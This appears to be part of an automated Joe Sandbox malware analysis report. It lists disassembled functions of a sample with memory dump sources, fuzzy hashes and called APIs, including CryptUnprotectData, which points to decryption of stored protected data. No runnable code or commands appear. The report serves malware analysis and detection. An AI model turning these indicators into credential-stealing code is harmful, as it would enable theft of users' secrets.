                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                  • Opcode ID: 407ca429f357083cf04c9c4c4872bb59689e7af532d69774cff42304fa8d9c9a
                                                                                                                                                                                                                                                  • Instruction ID: aaec17f7b947dffab737b8477b3de4f818deabd743cf75c3ee02614451b0506f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407ca429f357083cf04c9c4c4872bb59689e7af532d69774cff42304fa8d9c9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82178B2900B04AFD325DF3AD841BA7BBE4FF88340F008A2EF59A86611E734A445CB54
                                                                                                                                                                                                                                                  Function 009BB26D Relevance: 4.5, APIs: 3, Instructions: 42memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 009BB2A2
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009BB2BE
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009BB2DA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: 15f6dc5048d47219fb14a6744e974a135d179cd36fe1279d5f94c6062ea52bb7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF015A755083029FD301EF68C985A5AFBE9FFD8354F008A1AF88893350E770D994CBA2
                                                                                                                                                                                                                                                  Function 009B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction ID: d5ccccb239d267dee77c9fd3047dc5bff684dd2e02043b2d7da714a558b8c7e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7318AB6900609CFDB10CF99C984AEEBBF9FF88324F24404AD841A7351D771EA45CBA4
                                                                                                                                                                                                                                                  Function 009C42CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                                  • Opcode ID: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction ID: d39c18dc740b8a088fa98ab06db579028e54285b4c58fb63b3e160e9076f712b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05E06D289042909AD3118724FD47BC67B62AB9BB01F042248E740172E0DF785D69C39B
                                                                                                                                                                                                                                                  Function 004012ED Relevance: 1.3, APIs: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                                                                                                                  • Opcode ID: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction ID: 73c1bc0e1a2c2ea9f4fe637967f95df9bf94e01366c0a8a035d29b0c4e1660b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E0DF323013108BC6208B49ECC0E47B7AEEFC477871A0132E90097312C271AC50C664
                                                                                                                                                                                                                                                  Function 0041D627 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction ID: c28e032de6ce5a98ce404d14814fafdb89eb4e70d7cdf3da8bbe6a417b93b1fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77918274E1974648E3276B2DE1167F362415FF2388F02E35FED813A6BAD7AA44C5820D
                                                                                                                                                                                                                                                  Function 009CD88E Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction ID: 571c8e8205d013c7e01174c47378f0145c8845013f4ed07cc4c5824a0ba80a40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847c41e131354bfa88947affc4aa8b03807d6b3ec70732533f407165ca031faa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F691CB24D1A74608E3275B2DE116BB262455FF2388F03E36FED413F5BAD7BA44C5820A
                                                                                                                                                                                                                                                  Function 009B158C Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction ID: 0cf5ed27162275aac1acb3df7baf5e9cf54b0cddf3c05bd954f48d14aa205cc7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1f5ce9f70cf23b1a530eb2306dab1fc1f0e01b606b30518bff8843f3dffdcc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD31B032301B50EBCE219B09DBE5F91B77AAF84B747FE0152E8025B217D3A5AC41CA64
                                                                                                                                                                                                                                                  Function 0041F3CD Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction ID: 4360d2599e00573e4b65a519fd0795226561beaba091f7c302f61e0dfa65ca38
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02210131BB60F089C750AF3AC8645EB37A0CAEB2063EE59A5D9C087B13C315C54BC765
                                                                                                                                                                                                                                                  Function 009CF634 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction ID: 35ca647861992a04f7116d43d558dea2e88f258927ac75a441229ba760d162bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21F621BB60F08DC750AF39D974AE737A1CAEB2067EE59A8D5C087A63C315C50BC761
                                                                                                                                                                                                                                                  Function 00A29C23 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction ID: 1a135397043151056d979162b66cfad673380a00a738e5aa02b80fd0b1159db1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67113C72340110AFD754DF59EC85EA773EAEB89720B298065ED08CB316D676EC42C760
                                                                                                                                                                                                                                                  Function 009B0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction ID: 102f9b015f559d5b5fdc9428360cf24180a7eae29d0d7f77dfe56e77c5757729
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101A276A006048FDF21CF64CA05BEB33E9FBC6726F4545A5D90A9B2C1E774A9418F90
                                                                                                                                                                                                                                                  Function 009B1554 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction ID: 1259609da0929a4548f3b5f1d0ab8ac575e75c7b85c17dd5cc06218d51989e3d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE086733013149BC620CB49ECC4D86B7AEEFC56B475A4132E90057315D2A1AC50C674
                                                                                                                                                                                                                                                  Function 004012BE Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                  Function 009B1525 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
